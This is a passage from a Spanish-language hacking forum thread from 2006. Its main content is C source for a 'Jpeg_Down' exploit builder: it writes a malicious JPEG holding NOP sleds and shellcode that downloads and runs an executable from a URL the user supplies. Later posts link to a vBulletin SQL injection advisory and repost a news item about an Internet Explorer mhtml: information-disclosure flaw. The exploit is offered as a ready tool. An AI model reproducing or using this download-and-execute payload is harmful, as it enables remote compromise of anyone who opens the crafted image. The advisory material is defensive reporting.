"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68"
;

int main(int argc, char *argv[])
{
if (argc < 3)
{
printf("\r\n Consola Del Exploit \r\n", argv[0]);
printf("Uso: Imagen_de_destino.jpg <url del ejecutable a descargar>
<OutputPath>\r\n\r\n",argv[0]);
printf("Ejemplo :Jpeg_Down http://www.yoursite.com/server.exe
mypic.jpg\n");

return 0;
}

char *newshellcode = new char[sizeof(shellcode)+strlen(argv[1])+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,argv[1]);
strcat(newshellcode,"\x01");

FILE *fout;
unsigned int i=0,j=0;

if( (fout=fopen(argv[2],"wb")) == NULL )
{
printf("Error opening file!\n");
return 0;
}

j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
for(i=0;i<sizeof(header1)-1;i++)
fputc(header1[i],fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)
fputc(setNOPs1[i],fout);
for(i=0;i<sizeof(header2)-1;i++)
fputc(header2[i],fout);
for(i=j;i<0x63c;i++)
fputc(0x90,fout);
j=i;
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],fout);
for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++)
fputc(0x90,fout);
for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++)
fputc(setNOPs2[j],fout);

/* it is the marker for end of jpeg image*/
fprintf(fout,"\xFF\xD9");

fclose(fout);

printf("El Jpg Fue CreadoCon Tus Configuraciones .\n");
return 0;
}

« Última modificación: 14 Abril 2006, 20:56 por De@th » En línea

(8) REPENT, that's what I'm talking about
Whose mistake am I anyway? (8)
(8) You can't kill me motherfuckers ! (8)

Marilyn Manson - Antichrist Superstar
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Exploit SQL Inject en vBulletin
« Respuesta #40 en: 21 Abril 2006, 02:21 »

http://msgs.securepoint.com/cgi-bin/get/bugtraq0411/147.html

http://secunia.com/advisories/12531/

Google:

vbulletin 3.x+SQL injection

Resultados 61 - 70 de aproximadamente 609 de vbulletin 3.x+SQL injection

Saludos
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
el_cantante

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Internet Explorer Arbitrary Content Disclosure Vulnerability
« Respuesta #41 en: 29 Abril 2006, 14:22 »

 Una nueva vulnerabilidad en Internet Explorer, hecha pública por Secunia, podría ser explotada por personas maliciosas para revelar información potencialmente sensible.

La vulnerabilidad es provocada por un error en el manejo del URI "mhtml:", que permite eludir restricciones de seguridad. El problema puede ser explotado para acceder a documentos servidos por otro sitio web.

Secunia ha publicado una prueba de concepto en el siguiente enlace:

http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/

 La prueba muestra contenido de news.google.com en el contexto del navegador. Ello significa que si usted está accediendo a su cuenta bancaria vía web, cualquier otro sitio que visite, podría ser capaz de recuperar información confidencial de su banco. Esto también podría ser empleado para obtener datos confidenciales ingresados en sitios como eBay o Paypal.

La vulnerabilidad ha sido confirmada aún en un sistema con todos los parches al día, bajo Internet Explorer 6.0 y Microsoft Windows XP SP2.

Software vulnerable

- Microsoft Internet Explorer 6 SP1 (Windows 2000 SP4)
- Microsoft Internet Explorer 6 SP1 (Windows XP SP1)
- Microsoft Internet Explorer 6 (Windows XP SP2)
- Microsoft Internet Explorer 6 (Windows Server 2003)
- Microsoft Internet Explorer 6 (Windows Server 2003 SP1)
- Microsoft Internet Explorer 6 SP1 (Windows 98)
- Microsoft Internet Explorer 6 SP1 (Windows 98 SE)
- Microsoft Internet Explorer 6 SP1 (Windows Millennium)

Solución:

No existen soluciones oficiales al momento de esta alerta. La configuración sugerida por VSAntivirus en el siguiente enlace, protege al usuario de esta vulnerabilidad:

Configuración personalizada para hacer más seguro el IE

http://www.vsantivirus.com/faq-sitios-confianza.htm

Referencias:

Internet Explorer "mhtml:"
Redirection Disclosure of Sensitive Information
http://secunia.com/advisories/19738/

Internet Explorer Arbitrary Content Disclosure Vulnerability Test
http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/

Microsoft Internet Explorer "mhtml" Cross Domain Information Disclosure Vulnerability
http://www.frsirt.com/english/advisories/2006/1558

Créditos:

codedreamer

Glosario

URI (Uniform Resource Identifier o Identificador Universal de Recursos), es la secuencia de caracteres que identifica cualquier recurso (servicio, página, documento, dirección de correo electrónico, etc.) accesible en una red. Consta de dos partes, el identificador del método de acceso o protocolo (http:, ftp:, mailto:, etc.), y el nombre del recurso (//dominio, usuario@dominio, etc.). Un URL (Uniform Resource Locators), es un URI que muestra la localización explícita de un recurso (página, imagen, etc.).

Por Angela Ruiz

FUENTE: http://www.vsantivirus.com
En línea

El sistema del zapping mental en su apogeo, donde las horas pasan con la velocidad de la vida. No es el mismo domingo del principio, es un domingo anterior, otra temporada en el infierno, siete di­as atras.
Páginas: 1 2 [3] 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recopilatorio de Mensajes Interesantes [Actualizado 01/03/10]
Hacking Básico
Rojodos 1 187,688 Último mensaje 15 Septiembre 2010, 22:23
por kamsky
Recopilatorio de temas interesantes - Scripting -
Scripting
sirdarckcat 4 18,030 Último mensaje 21 Febrero 2009, 23:48
por Foxy Rider
[Recopilatorio] Sources interesantes
Programación C/C++
Littlehorse 13 18,769 Último mensaje 1 Mayo 2012, 21:12
por linkingcrk
Recopilatorio de temas interesantes
.NET
[D4N93R] 0 6,380 Último mensaje 2 Agosto 2010, 19:24
por [D4N93R]
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines